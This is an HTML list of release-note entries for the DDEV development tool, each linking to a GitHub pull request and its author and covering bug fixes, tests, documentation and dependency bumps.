<li>fix: use Lstat in PurgeDirectory to handle symlinks without following them by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4155751486" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8254" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8254/hovercard" href="https://github.com/ddev/ddev/pull/8254">#8254</a></li>
<li>build: bump 1password/load-secrets-action from 3 to 4 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4172470003" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8266" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8266/hovercard" href="https://github.com/ddev/ddev/pull/8266">#8266</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4172470003" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8266" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8266/hovercard" href="https://github.com/ddev/ddev/pull/8266">#8266</a></li>
<li>fix(test): check for GitHub token in TestAddonGetCircularDependencies by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4159046553" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8257" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8257/hovercard" href="https://github.com/ddev/ddev/pull/8257">#8257</a></li>
<li>fix(docker): use ContainerInspect polling instead of ContainerWait to avoid hangs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4170418883" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8265" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8265/hovercard" href="https://github.com/ddev/ddev/pull/8265">#8265</a></li>
<li>fix: bump action-linkspector from v1.3.5 to v1.4.0 to resolve setup-node@v4 warning [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187658262" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8269" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8269/hovercard" href="https://github.com/ddev/ddev/pull/8269">#8269</a></li>
<li>fix: use deb822 format for DDEV and Docker apt repositories, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4089757661" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8232" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8232/hovercard" href="https://github.com/ddev/ddev/issues/8232">#8232</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4090545661" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8233" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8233/hovercard" href="https://github.com/ddev/ddev/pull/8233">#8233</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4090545661" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8233" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8233/hovercard" href="https://github.com/ddev/ddev/pull/8233">#8233</a></li>
<li>feat(autostart): automatically start projects on command when project stopped, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112666275" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8245" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8245/hovercard" href="https://github.com/ddev/ddev/issues/8245">#8245</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160083737" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8258" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8258/hovercard" href="https://github.com/ddev/ddev/pull/8258">#8258</a></li>
<li>test(lagoon): use new amazee.io testing environment for Lagoon integration (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4188432719" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8270" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8270/hovercard" href="https://github.com/ddev/ddev/pull/8270">#8270</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rocketeerbkw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rocketeerbkw">@rocketeerbkw</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4188432719" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8270" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8270/hovercard" href="https://github.com/ddev/ddev/pull/8270">#8270</a></li>
<li>build(arm64): php8.5-memcached from repos, refactor ddev-webserver tests, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136230595" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8252" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8252/hovercard" href="https://github.com/ddev/ddev/pull/8252">#8252</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4181659749" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8268" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8268/hovercard" href="https://github.com/ddev/ddev/pull/8268">#8268</a></li>
<li>test(webserver): wait for FPM reload to settle after xdebug disable (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4194822172" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8272" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8272/hovercard" href="https://github.com/ddev/ddev/pull/8272">#8272</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4194822172" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8272" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8272/hovercard" href="https://github.com/ddev/ddev/pull/8272">#8272</a></li>
<li>refactor: implement config model using viper, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2112811450" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/5763" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/5763/hovercard" href="https://github.com/ddev/ddev/issues/5763">#5763</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3992038076" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8181" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8181/hovercard" href="https://github.com/ddev/ddev/pull/8181">#8181</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/agviu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/agviu">@agviu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3992038076" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8181" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8181/hovercard" href="https://github.com/ddev/ddev/pull/8181">#8181</a></li>
<li>feat(cmd): <code>ddev exec</code> accepts a <code>--project</code> flag, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4106836278" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8241" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8241/hovercard" href="https://github.com/ddev/ddev/issues/8241">#8241</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/penyaskito/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/penyaskito">@penyaskito</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4108166701" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8244" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8244/hovercard" href="https://github.com/ddev/ddev/pull/8244">#8244</a></li>
<li>feat(wordpress): use runtime DDEV_PRIMARY_URL for WP_HOME, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3892856192" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8098" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8098/hovercard" href="https://github.com/ddev/ddev/issues/8098">#8098</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonesrussell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonesrussell">@jonesrussell</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3981945202" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8176" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8176/hovercard" href="https://github.com/ddev/ddev/pull/8176">#8176</a></li>
<li>chore(drupal): add support for symfony_mailer 2.x to drupal settings.ddev.php by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hchonov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hchonov">@hchonov</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195029224" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8274" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8274/hovercard" href="https://github.com/ddev/ddev/pull/8274">#8274</a></li>
<li>test(wsl2): add cleanup for ddev/docker apt sources leftovers, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4090545661" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8233" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8233/hovercard" href="https://github.com/ddev/ddev/pull/8233">#8233</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4196062854" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8275" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8275/hovercard" href="https://github.com/ddev/ddev/pull/8275">#8275</a></li>
<li>feat: Display project info (name and environment) when calling ddev pull/push, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4023124560" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8201" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8201/hovercard" href="https://github.com/ddev/ddev/issues/8201">#8201</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariano-dagostino/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariano-dagostino">@mariano-dagostino</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4023127186" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8202" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8202/hovercard" href="https://github.com/ddev/ddev/pull/8202">#8202</a></li>
<li>fix(config): detect custom files, add <code>ddev utility check-custom-config</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4054791632" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8218" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8218/hovercard" href="https://github.com/ddev/ddev/pull/8218">#8218</a></li>
<li>fix(docker): use ddev-utilities image for volume/utility RunSimpleContainer calls to fix Lima/Colima 10-30m hangs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4189274286" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8271" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8271/hovercard" href="https://github.com/ddev/ddev/pull/8271">#8271</a></li>
<li>test(traefik): skip TestCustomGlobalConfig on Rancher Desktop, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3966004031" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8167" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8167/hovercard" href="https://github.com/ddev/ddev/issues/8167">#8167</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4201053894" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8283" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8283/hovercard" href="https://github.com/ddev/ddev/pull/8283">#8283</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4201053894" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8283" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8283/hovercard" href="https://github.com/ddev/ddev/pull/8283">#8283</a></li>
<li>fix(docker): use ddev-utilities for remaining RunSimpleContainer calls (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4200967452" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8282" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8282/hovercard" href="https://github.com/ddev/ddev/pull/8282">#8282</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4200967452" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8282" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8282/hovercard" href="https://github.com/ddev/ddev/pull/8282">#8282</a></li>
<li>fix(mutagen): tolerate transient staging files during volume chown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4200839132" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8281" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8281/hovercard" href="https://github.com/ddev/ddev/pull/8281">#8281</a></li>
<li>refactor: detect custom files in <code>ddev utility diagnose</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198978035" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8279" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8279/hovercard" href="https://github.com/ddev/ddev/pull/8279">#8279</a></li>
<li>docs: Update Contao Quickstart Recipe (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198884471" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8278" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8278/hovercard" href="https://github.com/ddev/ddev/pull/8278">#8278</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fkaminski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fkaminski">@fkaminski</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198884471" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8278" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8278/hovercard" href="https://github.com/ddev/ddev/pull/8278">#8278</a></li>
<li>docs: improve AI agent instructions and dev workflow guidance [skip ci] (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4201897136" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8284" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8284/hovercard" href="https://github.com/ddev/ddev/pull/8284">#8284</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4201897136" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8284" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8284/hovercard" href="https://github.com/ddev/ddev/pull/8284">#8284</a></li>
<li>fix(addons): sleep 500ms after creating config files on Lima/Colima/Rancher Desktop (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207705206" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8288" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8288/hovercard" href="https://github.com/ddev/ddev/pull/8288">#8288</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207705206" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8288" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8288/hovercard" href="https://github.com/ddev/ddev/pull/8288">#8288</a></li>
<li>chore: remove obsolete commands, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4209067131" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8291" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8291/hovercard" href="https://github.com/ddev/ddev/issues/8291">#8291</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4212492889" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8292" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8292/hovercard" href="https://github.com/ddev/ddev/pull/8292">#8292</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4212492889" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8292" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8292/hovercard" href="https://github.com/ddev/ddev/pull/8292">#8292</a></li>
<li>fix: normalize path separators in check-custom-config output on Windows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207548564" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8286" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8286/hovercard" href="https://github.com/ddev/ddev/pull/8286">#8286</a></li>
<li>docs: add october cms to quickstart instructions (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206103369" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8285" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8285/hovercard" href="https://github.com/ddev/ddev/pull/8285">#8285</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/daftspunk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/daftspunk">@daftspunk</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206103369" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8285" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8285/hovercard" href="https://github.com/ddev/ddev/pull/8285">#8285</a></li>
<li>test: fail fast when command tests would use PATH ddev by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonesrussell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonesrussell">@jonesrussell</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4200329881" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8280" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8280/hovercard" href="https://github.com/ddev/ddev/pull/8280">#8280</a></li>
<li>build(ci): pin textlint@15.5.2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226016028" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8300" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8300/hovercard" href="https://github.com/ddev/ddev/pull/8300">#8300</a></li>
<li>refactor(wordpress): make wp-config-ddev.php a static asset, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3892856192" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8098" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8098/hovercard" href="https://github.com/ddev/ddev/issues/8098">#8098</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207620463" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8287" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8287/hovercard" href="https://github.com/ddev/ddev/pull/8287">#8287</a></li>
<li>docs: rewrite Windows installation instructions, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3773375752" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7996" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7996/hovercard" href="https://github.com/ddev/ddev/issues/7996">#7996</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3494801888" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7703" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7703/hovercard" href="https://github.com/ddev/ddev/issues/7703">#7703</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208869123" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8290" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8290/hovercard" href="https://github.com/ddev/ddev/pull/8290">#8290</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208869123" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8290" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8290/hovercard" href="https://github.com/ddev/ddev/pull/8290">#8290</a></li>
<li>docs(quickstart): add Tempest (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4225515066" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8299" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8299/hovercard" href="https://github.com/ddev/ddev/pull/8299">#8299</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4225515066" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8299" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8299/hovercard" href="https://github.com/ddev/ddev/pull/8299">#8299</a></li>
<li>feat: support "virtioproxy" WSL2 networking mode, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057501099" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8220" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8220/hovercard" href="https://github.com/ddev/ddev/issues/8220">#8220</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162106325" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8262" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8262/hovercard" href="https://github.com/ddev/ddev/pull/8262">#8262</a></li>
<li>build(ci): remove pin for textlint, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226016028" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8300" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8300/hovercard" href="https://github.com/ddev/ddev/pull/8300">#8300</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231353026" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8303" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8303/hovercard" href="https://github.com/ddev/ddev/pull/8303">#8303</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231353026" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8303" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8303/hovercard" href="https://github.com/ddev/ddev/pull/8303">#8303</a></li>
<li>fix: ensure up-to-date images for ddev-ssh-agent and ddev-router (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4232616250" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8305" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8305/hovercard" href="https://github.com/ddev/ddev/pull/8305">#8305</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4232616250" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8305" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8305/hovercard" href="https://github.com/ddev/ddev/pull/8305">#8305</a></li>
<li>fix(webserver): always use webimage from app config (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231897705" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8304" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8304/hovercard" href="https://github.com/ddev/ddev/pull/8304">#8304</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231897705" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8304" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8304/hovercard" href="https://github.com/ddev/ddev/pull/8304">#8304</a></li>
